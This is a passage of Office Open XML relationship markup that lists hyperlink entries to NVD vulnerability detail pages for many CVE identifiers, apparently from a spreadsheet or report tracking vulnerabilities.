Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69838" TargetMode="External" Id="rId3466" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69859" TargetMode="External" Id="rId3467" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69866" TargetMode="External" Id="rId3468" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69889" TargetMode="External" Id="rId3469" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69891" TargetMode="External" Id="rId3470" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69896" TargetMode="External" Id="rId3471" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69911" TargetMode="External" Id="rId3472" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70283" TargetMode="External" Id="rId3473" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70562" TargetMode="External" Id="rId3474" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70565" TargetMode="External" Id="rId3475" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70567" TargetMode="External" Id="rId3476" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70568" TargetMode="External" Id="rId3477" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70573" TargetMode="External" Id="rId3478" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70577" TargetMode="External" Id="rId3479" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70578" TargetMode="External" Id="rId3480" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70585" TargetMode="External" Id="rId3481" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71324" TargetMode="External" Id="rId3482" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71332" TargetMode="External" Id="rId3483" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71333" TargetMode="External" Id="rId3484" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71340" TargetMode="External" Id="rId3485" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71342" TargetMode="External" Id="rId3486" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71351" TargetMode="External" Id="rId3487" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71353" TargetMode="External" Id="rId3488" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72718" TargetMode="External" Id="rId3489" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72926" TargetMode="External" Id="rId3490" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72930" TargetMode="External" Id="rId3491" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72952" TargetMode="External" Id="rId3492" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72963" TargetMode="External" Id="rId3493" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73003" TargetMode="External" Id="rId3494" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73005" TargetMode="External" Id="rId3495" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73022" TargetMode="External" Id="rId3496" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73033" TargetMode="External" Id="rId3497" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74038" TargetMode="External" Id="rId3498" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74044" TargetMode="External" Id="rId3499" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74236" TargetMode="External" Id="rId3500" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74796" TargetMode="External" Id="rId3501" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77485" TargetMode="External" Id="rId3502" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77894" TargetMode="External" Id="rId3503" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77897" TargetMode="External" Id="rId3504" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77899" TargetMode="External" Id="rId3505" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77905" TargetMode="External" Id="rId3506" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78457" TargetMode="External" Id="rId3507" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78464" TargetMode="External" Id="rId3508" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79636" TargetMode="External" Id="rId3509" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80093" TargetMode="External" Id="rId3510" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81192" TargetMode="External" Id="rId3511" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81389" TargetMode="External" Id="rId3512" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82062" TargetMode="External" Id="rId3513" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82079" TargetMode="External" Id="rId3514" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83940" TargetMode="External" Id="rId3515" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83999" TargetMode="External" Id="rId3516" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85360" TargetMode="External" Id="rId3517" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85594" TargetMode="External" Id="rId3518" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86135" TargetMode="External" Id="rId3519" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86419" TargetMode="External" Id="rId3520" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86749" TargetMode="External" Id="rId3521" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87088" TargetMode="External" Id="rId3522" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87825" TargetMode="External" Id="rId3523" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87877" TargetMode="External" Id="rId3524" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88004" TargetMode="External" Id="rId3525" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88008" TargetMode="External" Id="rId3526" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88924" TargetMode="External" Id="rId3527" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-51008" TargetMode="External" Id="rId3528" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-58379" TargetMode="External" Id="rId3529" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-13465" TargetMode="External" Id="rId3530" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-15613" TargetMode="External" Id="rId3531" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-71418" TargetMode="External" Id="rId3532" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-1199" TargetMode="External" Id="rId3533" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13326" TargetMode="External" Id="rId3534" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14227" TargetMode="External" Id="rId3535" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15417" TargetMode="External" Id="rId3536" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15580" TargetMode="External" Id="rId3537" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15933" TargetMode="External" Id="rId3538" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16455" TargetMode="External" Id="rId3539" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17038" TargetMode="External" Id="rId3540" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18401" TargetMode="External" Id="rId3541" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18444" TargetMode="External" Id="rId3542" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18445" TargetMode="External" Id="rId3543" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18916" TargetMode="External" Id="rId3544" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21088" TargetMode="External" Id="rId3545" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21089" TargetMode="External" Id="rId3546" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21098" TargetMode="External" Id="rId3547" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21100" TargetMode="External" Id="rId3548" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21107" TargetMode="External" Id="rId3549" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21108" TargetMode="External" Id="rId3550" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21110" TargetMode="External" Id="rId3551" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21111" TargetMode="External" Id="rId3552" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-23923" TargetMode="External" Id="rId3553" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-32686" TargetMode="External" Id="rId3554" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-34964" TargetMode="External" Id="rId3555" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-39892" TargetMode="External" Id="rId3556" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-40895" TargetMode="External" Id="rId3557" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42039" TargetMode="External" Id="rId3558" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45274" TargetMode="External" Id="rId3559" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46688" TargetMode="External" Id="rId3560" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52738" TargetMode="External" Id="rId3561" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52873" TargetMode="External" Id="rId3562" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53454" TargetMode="External" Id="rId3563" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53531" TargetMode="External" Id="rId3564" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53551" TargetMode="External" Id="rId3565" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53602" TargetMode="External" Id="rId3566" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53757" TargetMode="External" Id="rId3567" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53785" TargetMode="External" Id="rId3568" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53788" TargetMode="External" Id="rId3569" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53794" TargetMode="External" Id="rId3570" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53933" TargetMode="External" Id="rId3571" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53965" TargetMode="External" Id="rId3572" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54272" TargetMode="External" Id="rId3573" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54739" TargetMode="External" Id="rId3574" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54768" TargetMode="External" Id="rId3575" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55371" TargetMode="External" Id="rId3576" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55529" TargetMode="External" Id="rId3577" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55678" TargetMode="External" Id="rId3578" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55758" TargetMode="External" Id="rId3579" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56758" TargetMode="External" Id="rId3580" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57160" TargetMode="External" Id="rId3581" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61893" TargetMode="External" Id="rId3582" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62652" TargetMode="External" Id="rId3583" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62992" TargetMode="External" Id="rId3584" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62993" TargetMode="External" Id="rId3585" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62996" TargetMode="External" Id="rId3586" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63033" TargetMode="External" Id="rId3587" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63426" TargetMode="External" Id="rId3588" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63654" TargetMode="External" Id="rId3589" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66002" TargetMode="External" Id="rId3590" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66349" TargetMode="External" Id="rId3591" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67279" TargetMode="External" Id="rId3592" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67339" TargetMode="External" Id="rId3593" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67353" TargetMode="External" Id="rId3594" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67440" TargetMode="External" Id="rId3595" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67613" TargetMode="External" Id="rId3596" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69090" TargetMode="External" Id="rId3597" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69092" TargetMode="External" Id="rId3598" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69198" TargetMode="External" Id="rId3599" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69248" TargetMode="External" Id="rId3600" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70611" TargetMode="External" Id="rId3601" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71313" TargetMode="External" Id="rId3602" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72748" TargetMode="External" Id="rId3603" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72784" TargetMode="External" Id="rId3604" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72816" TargetMode="External" Id="rId3605" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72817" TargetMode="External" Id="rId3606" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72820" TargetMode="External" Id="rId3607" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73324" TargetMode="External" Id="rId3608" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73848" TargetMode="External" Id="rId3609" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74046" TargetMode="External" Id="rId3610" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74235" TargetMode="External" Id="rId3611" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74871" TargetMode="External" Id="rId3612" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75125" TargetMode="External" Id="rId3613" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75126" TargetMode="External" Id="rId3614" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75135" TargetMode="External" Id="rId3615" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75136" TargetMode="External" Id="rId3616" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75137" TargetMode="External" Id="rId3617" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75575" TargetMode="External" Id="rId3618" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75592" TargetMode="External" Id="rId3619" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77217" TargetMode="External" Id="rId3620" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77218" TargetMode="External" Id="rId3621" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78084" TargetMode="External" Id="rId3622" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78085" TargetMode="External" Id="rId3623" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78303" TargetMode="External" Id="rId3624" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78325" TargetMode="External" Id="rId3625" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78374" TargetMode="External" Id="rId3626" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79743" TargetMode="External" Id="rId3627" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79776" TargetMode="External" Id="rId3628" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79781" TargetMode="External" Id="rId3629" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80113" TargetMode="External" Id="rId3630" /><Relationship 